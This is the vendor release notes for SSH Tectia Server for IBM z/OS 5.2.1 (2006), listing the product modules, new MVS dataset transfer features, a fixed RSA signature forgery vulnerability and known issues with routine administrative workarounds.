Release Notes for SSH Tectia Server for IBM z/OS 5.2.1 26 September 2006 (C) 2006 SSH Communications Security Corp. This software is protected by international copyright laws. All Rights Reserved. Table of Contents 1. About This Release 1.1 Product Name Change 1.2 The SSH Tectia Client/Server Solution 1.3 SSH Tectia Server for IBM z/OS 5.2 1.4 The SSH Tectia Client Module on z/OS 2. CD Contents 2.1 Binaries 2.2 Documentation 3. Key New Features in Version 5.2 4. Bug Fixes 5. Known Issues 6. Further Information ******************************************************************** NOTE ******************************************************************** Please read the license agreement located in the CD-ROM root before installing the software. Should you have any questions, please contact ssh.sales@ssh.com or your sales representative. ******************************************************************** ******************************************************************** Please refer to SSH Tectia Server for IBM z/OS Administrator Manual for instructions on installing and removing the software. 1. About This Release 1.1 Product Name Change Release 5.2 introduced a change in the product naming: SSH Tectia Server (M) is renamed SSH Tectia Server for IBM z/OS. 1.2 The SSH Tectia Client/Server Solution The SSH Tectia client/server solution is an end-to-end communications security solution for multi-platform environments. It is based on the Secure Shell technology from the original developers. The SSH Tectia client/server solution consists of four product modules: * SSH Tectia Server * SSH Tectia Server for IBM z/OS * SSH Tectia Client * SSH Tectia Connector The product modules are expandable with the following add-on packs: * EFT Expansion Pack for SSH Tectia Server * EFT Expansion Pack for SSH Tectia Client * Tunneling Expansion Pack for SSH Tectia Server SSH Tectia Server provides secure terminal, secure file transfer, and tunneling server functionality for system administrators and other users of SSH Tectia Client. SSH Tectia Server with EFT Expansion Pack provides a secure file transfer server to be used in conjunction with SSH Tectia Client with EFT Expansion Pack to enable secure and reliable high-performance file transfers in heterogeneous enterprise environments. SSH Tectia Client with EFT Expansion Pack provides client-side SFTP (Secure File Transfer Protocol) APIs, GUI, and command-line tools for securing non-interactive and automated file transfers. SSH Tectia Client with EFT Expansion Pack has been specifically designed for use with SSH Tectia Server with EFT Expansion Pack, Tectia Server for IBM z/OS, enabling secure and reliable high-performance file transfers in heterogeneous enterprise environments. SSH Tectia Server with Tunneling Expansion Pack provides tunneling server functionality for users of SSH Tectia Connector and secure terminal and secure file transfer functionality for users of SSH Tectia Client. SSH Tectia Connector is designed to work exclusively with SSH Tectia Server with Tunneling Expansion Pack and Server for IBM z/OS to provide completely transparent secure application connectivity without any user intervention. SSH Tectia Server for IBM z/OS includes the key functionality of the server side EFT Expansion Pack and server side Tunneling Expansion Pack. 1.3 SSH Tectia Server for IBM z/OS 5.2 SSH Tectia Server for IBM z/OS 5.2 is designed for securing IBM z/OS mainframe connectivity and provides tunneling server functionality for users of SSH Tectia Connector and secure terminal and secure file transfer functionality for users of SSH Tectia Client. SSH Tectia Server for IBM z/OS 5.2 provides secure system administration, enabling system administrators to remotely administer application servers and other resources using a secure connection. With this system, IT Security Administrators can manage dispersed resources without the fear that the system administration infrastructure itself will become compromised. For supporting secure file transfers between IBM z/OS systems, and between IBM z/OS and distributed hosts, SSH Tectia Server for IBM z/OS 5.2 provides a secure file transfer server to be used in conjunction with SSH Tectia Client with EFT Expansion Pack, or other Secure Shell clients, to enable secure and reliable high-performance file transfers in heterogeneous enterprise environments. The server provides support for direct secure file transfers to and from the MVS file system, and performs the codeset translation. In addition, SSH Tectia Server for IBM z/OS 5.2 allows large enterprises to begin securing their corporate business applications using SSH Tectia with minimum desktop software investments. SSH Tectia Server for IBM z/OS combines the SSH secure system administration functionality with transparent application tunneling for TN3270 users through SSH Tectia Connector, the client software that is completely transparent to the user and enables secure application connectivity without any user intervention. 1.4 The SSH Tectia Client Module on z/OS The client module is designed for securing IBM z/OS mainframe connectivity and provides enhanced usability and features especially for secure file transfer functionality between IBM z/OS systems, and between IBM z/OS and distributed hosts. The client provides support for direct secure file transfers to and from the MVS file system, and performs the codeset translation without staging the file. A profile setup can be utilized for significant improvement of the usability and user experience. Profiles for different host and file types can be defined at server and/or user level. The default profile also supports profile-defined ASCII-EBCDIC translation when using the SSH Tectia Client GUI drag-and-drop functionality. More information on the key features in SSH Tectia Server for IBM z/OS 5.2 can be found in Section 3 and in the Administrator Manual. 2. CD Contents Please refer to SSH Tectia Server for IBM z/OS Administrator Manual for details on installation packages and step-by-step instructions on how to install the product into the IBM z/OS environment. 2.1 Binaries The latest binaries are version 5.2.1. install/zos/ Installation package for IBM z/OS. 2.2 Documentation index.html The CD contents front page. license.html, license.txt The license agreement in HTML and text formats. releasenotes.txt This file. doc/SSHTectiaServer_M_ProductDescription.pdf, doc/SSHTectiaServer_M_ProductDescription_html/index.html Product Description for the SSH Tectia client/server solution in PDF and HTML formats. doc/SSHTectiaServer_M_AdminManual.pdf, doc/SSHTectiaServer_M_AdminManual_html/index.html Administrator Manual for SSH Tectia Server for IBM z/OS in PDF and HTML formats. 3. Key New Features in Version 5.2 Version 5.2.1 of SSH Tectia Server for IBM z/OS is a maintenance release and contains no new features. Version 5.2.0 of SSH Tectia Server for IBM z/OS contains the following new features and enhancements: * Direct streaming transfers of MVS datasets on server module: - Direct read and write access to MVS datasets during file transfers in one-step-process. - The new protocol extensions do not require any additional memory or disk staging when initiating MVS transfers from SSH Tectia Clients in Windows, Unix, and Linux platforms. Direct streaming on server module requires the SSH Tectia Client 5.2 with EFT Expansion Pack. Direct streaming on SSH Tectia Server for IBM z/OS client module is already supported from version 5.1 onwards. * New MVS dataset listing functionality: - Users can interactively list datasets with GUI or command line tools. - Easy "files and folders" -look dataset listings and drag-and-drop file transfers with SFTP GUI file transfer clients. - The 'cd' and 'ls' commands for navigating and listing MVS datasets with command line tools. * New MVS dataset read-write support: SFTP GUI drag-and-drop file transfer support for MVS datasets with codeset and file format conversion based on user level configurable transfer profiles. * Server-side support for APPEND mode file transfers. This requires the SSH Tectia Client 5.2 with EFT Expansion Pack. * Optimized server internal operations for MVS datasets. Support for parallel file transfers in one connection. * Comprehensive set of dataset parameters during dataset allocation. * Compatibility mode for third-party and older clients is also supported. * Server-side support for new features incorporated into SSH Tectia clients in non-mainframe environments: - FTP-SFTP Conversion feature for seamless and transparent conversion of unsecured FTP transfers into secure SFTP without the need to modify scripts, applications, or operations (when used in conjunction with SSH Tectia Client 5.1 with EFT Expansion Pack). See SSH Tectia Server for IBM z/OS Administrator Manual and the man pages for more specific configuration options. 4. Bug Fixes The following SSH Tectia Server (M) 5.2.0 bug was fixed: - Fixed RSA signature forgery vulnerability in SSH Tectia Client, Connector, Server, and Manager products. CERT reference number VU#845620 5. Known issues The following issues are currently known in SSH Tectia Server for IBM z/OS 5.2.1: - The `ssh2' client does not work if su is used before establishing the ssh2 connection. The error output depends on the terminal used and the kind of su made before the ssh2 connection attempt. You may see the error message BPX015I HFS PROGRAM ssh2 IS NOT MARKED PROGRAM CONTROLLED. ssh2 does not need to be program-controlled, instead avoid using su before starting ssh2. (Will be fixed in 5.2.2.) - SSH Tectia Server M 5.1 or SSH Tectia Server IBM z/OS 5.2 do not support authentication using certificates. (Will be fixed in 5.3.0.) - ssh2 hangs when run from TSO OMVS shell. Passwords and passphrases can not be entered in the OMVS shell. To run client programs under TSO in the OMVS shell, use public key authentication. Use a private key without passphrase, or run 'ssh-agent2' and 'ssh-add2' in a telnet or 'ssh2' shell and export the SSH2_AUTH_SOCK variable in OMVS. (Will be fixed in 5.2.2.) - If TCPIP is stopped while the server is running the server may enter a tight CPU loop. Stop 'sshd2' before stopping TCPIP. - Message and debug output from the server `sshd2' is shown correctly when sshd2 is run from a USS command prompt and when sent to a client program. However, when the output is redirected to a file, piped to a process, or written directly to a HFS file, the output is in ASCII. Output is written directly to a HFS file when sshd2 is run as a started task. The output should be in EBCDIC. (Will be fixed in 5.2.2.) Workaround 1: View the output with a command that converts the contents into EBCDIC, e.g: iconv -f ISO8859-1 -t IBM-1047 /home/SSHD2/sshd2.err | less Workaround 2: Tag the file as EBCDIC before running sshd2, e.g: chtag -t -c 1047 /home/SSHD2/sshd2.err or tag the file as ASCII after running sshd2, e.g: chtag -t -c 819 /home/SSHD2/sshd2.err - 'uninstall.sh' script leaves some files in '/etc/ssh2/' and '/usr/lpp/ssh2/'. (Will be fixed in 5.2.2.) - Some client messages are using different character encoding Some messages from 'ssh2', 'scp2', and 'sftp2' are written in ASCII to the terminal. - One-shot ssh2 tunnel won't close. When 'ssh2' is used to forward local port with single shot mode ('-fo'), is does not close the tunnel after the connecting application has exited. (Will be fixed in 5.2.2.) - scp2 and sftp2 use random home directory. If 'ssh2', 'scp2' or 'sftp2' is run as user with user id 0, the system selects the home directory randomly from the list of all users with user id 0. This might make the authentication to fail since the keys might not be correct. As a workaround, command line option -i can be used to specify the correct user identity file. (Will be fixed in 5.3.0.) - Package installs the ssh-certd startup script. 'setup.sh' installs ssh-certd start-up script, even though ssh-certd is not part of the package. (Will be fixed in 5.3.0.) - In SSH Tectia Server for IBM z/OS 5.2.1, dataset listing is only provided by SFTP server. 'sftp2' does not have this feature. In order to list datasets in z/OS connect to local SFTP server: sftp2 localhost sftp> cd /_ sftp> ls -l - sft-server-g3 parses advice string in sftp2 cd command incorrectly. If a file transfer advice string is added to sftp2 cd command, the server parses it incorrectly and returns a wrong path to the client. (Will be fixed in 5.2.2.) - sft-server-g3 shows dataset size wrong if dataset size is greater than 2GB. If dataset size if greater than 2GB, the size in dataset listing is shown in a wrong way. (Will be fixed in 5.2.2.) - Ftadv parameter VOLUMES cannot be comma separated list of volumes File transfer advice parameter VOLUMES should be a plus sign (+) separated list of volume names. (Will be fixed in 5.2.2.) - scp2 removes \ sign from the username If username is defined with Windows domain, scp2 removes the '\' sign and authentication fails. (Will be fixed in 5.2.2.) - Ability to use MVS dataset as sftp2 batchfiles. sftp2 cannot use MVS datasets as batch files. (Will be fixed in 5.2.2.) - Advice string parameters are not honored. File transfer parameter X (TRANSFER_MODE) has wrong default. If X is not given, file transfer defaults to binary transfer even though C and D might exist. Correct behavior is that if C and D are given and X is not present, codeset conversions are performed. Only if X=BIN is explicitely specified, no codeset conversion takes place. (Will be fixed in 5.2.2.) - FB dataset cannot be allocated. Problem: Datasets are always created with RECFM=VB and LRECL=1024 despite other attributes in the FTADV string when running a client program, scp2 or sftp2, in JCL. Description: This problem has only been seen on one system. The system was running z/OS 1.6. If you see this problem when running a command such as BPXBATCH PGM /usr/lpp/ssh2/bin/scp2 + user@host:textfile.txt + /ftadv:O=FB,R=80,T=PS/__FB80.JOHAN2 turn on debug for the advisor script: -D *Advisor=99 + If the debug output contains the error message 'BPXW9044I spawn for bpxwrtso failed' you have this problem. Fix: Add this line to the environment variable file (DD name STDENV): _BPX_SHAREAS=NO - Datasets cannot be addressed with /_ format. In JCL, datasets cannot be addressed without user prefix if dataset path includes file transfer advice string. For example the following does not work: BPXBATCH PGM /usr/lpp/ssh2/bin/scp2 -D 7+ -oallowedauthentications=publickey + user@host:testfile.txt + /FTADV:C=ISO8859-1,D=IBM-1047/__WEBEX.FILE1 Workaround is to use absolute dataset paths: BPXBATCH PGM /usr/lpp/ssh2/bin/scp2 -D 7+ -oallowedauthentications=publickey + user@host:testfile.txt + /FTADV:C=ISO8859-1,D=IBM-1047/___USER.WEBEX.FILE1 (Will be fixed in 5.2.2.) - Mismatched DD names do not cause error message. When a file name with the format //DD:NAME is used in a scp2 command, it is intended to refer to a DD card in the JCL. If the DD card is missing, or the name does not match the name in the command, no error is reported, instead the client accesses a HFS file with the name DD:NAME. (Will be fixed in 5.2.2.) - REFDD does not work. Use LIKE parameter. (Will be fixed in 5.2.2.) - sftp2 mput to a PDS creates empty files (Will be fixed in 5.2.2.) - Incorrect error message for file not found. (Will be fixed in 5.2.2.) - Starting an FTP tunnel kills session or fails with an error. FTP tunneling cannot be used on interactive sh shell. Use other shells like tcsh or bash, or use non-interactive sessions for FTP tunneling. - File tags on files transfered to HFS are unset. If files are transferred in binary mode, sft-server-g3 does not set the file tag (binary/EBCDIC/ASCII). (Will be fixed in 5.3.0.) - File transfer server reports memory leaks to client. (Will be fixed in 5.2.2.) - The sftp server chmod sets permissions incorrectly. Non-numeric arguments to 'chmod' command with the mainframe sftp server behaves in a strange way. Use numeric arguments e.g. chmod 755 file (Will be fixed in 5.2.2.) - UNIT parameter won't work with device numbers. - Remote command output is garbage in JCL. When running ssh2 with a remote command in JCL, the command output is in ASCII and prints as garbage. (Will be fixed in 5.2.2.) - File is not truncated if the OpenSSH sftp client is used. The original file is not truncated when the OpenSSH sftp client is used for overwriting a larger file. (Will be fixed in 5.2.2.) - DD name does not work. Creating, reading and overwriting local data sets allocated by JCL DD statements in the scp2 and sftp2 command line client programs is now supported (earlier only creating data sets worked). The following sftp2 commands are not supported when the file name is a DD name: - remove (lrm and rm) - rename - mkdir - rmdir (Will be fixed in 5.2.2.) 6. Further Information More information can be found from the man pages and from the SSH Tectia manuals, which are also available at http://www.ssh.com/support/. Additional licenses can be purchased from our online store at http://www.ssh.com/company/sales/store/.